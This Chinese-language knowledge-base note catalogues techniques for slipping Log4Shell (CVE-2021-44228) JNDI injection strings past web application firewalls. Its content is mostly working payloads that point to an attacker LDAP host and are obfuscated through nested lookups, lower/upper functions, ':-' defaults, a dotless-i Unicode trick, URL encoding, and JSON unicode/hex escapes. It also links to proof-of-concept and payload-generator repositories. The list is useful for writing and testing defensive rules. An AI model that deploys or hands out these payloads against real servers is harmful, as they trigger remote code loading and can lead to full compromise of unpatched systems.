Log4j waf绕过方式 log4j waf bypass

up:: [[ 专题 Special Topic ]]-log4j

 • 系统环境变量

    ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}
  
  • 来自 Apache Log4j 2 文档:${env:ENV_NAME:-default_value}
  • 如果没有 ENV_NAME 系统环境变量,则使用 :- 后面的变量;攻击者可以使用任何名称代替 ENV_NAME,但它必须是不存在的环境变量。
 • Lookup方法:Lower / Upper

    ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}
    ${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://somesitehackerofhell.com/z}
  
  • Lower Lookup 会将传入的参数转换为小写,嵌套形式如下:
   • ${lower:}
  • Upper Lookup 会将传入的参数转换为大写,嵌套形式如下:
   • ${upper:}
 • ”::-“ 符号

    ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}
  
  • 同系统环境变量部分。
 • ”:-“ 符号

    ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://somesitehackerofhell.com/z}
  
 • 无效的Unicode字符

    ${jnd${upper:ı}:ldap://somesitehackerofhell.com/z}
  
  • 这里的 ı(\u0131) 不是 i(\x69)和I(\x49),经过 upper 就会转变成 I,从而绕过了 jndi 关键词的拦截。
 • HTML编码

    } with %7D
    { with %7B
    $ with %24
  
 • unicode / hex 编码特性

  • 虽然这个范围有点大可能会产生一些误报,但鉴于漏洞的严重性还是有很多人建议拦截 ${ 但这样也未必能够真正的解决,因为漏洞的触发点是在打印日志的时候把可控内容携带进去了。现在随着 JSON 数据格式的流行,很多系统都在使用 JSON 处理参数,JSON 处理库用的最多的就数 Jackson和fastjson。而 Jackson 和 fastjson 又有 unicode 和 hex 的编码特性,如:
     {"key":"\u0024\u007b"}
     {"key":"\x24\u007b"}
   
  • 这样就避开了数据包中有 ${ 的条件。
 • 来源

  • https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg
  • https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
  • https://github.com/woodpecker-appstore/log4j-payload-generator
  • https://canarytokens.org/generate

Notes mentioning this note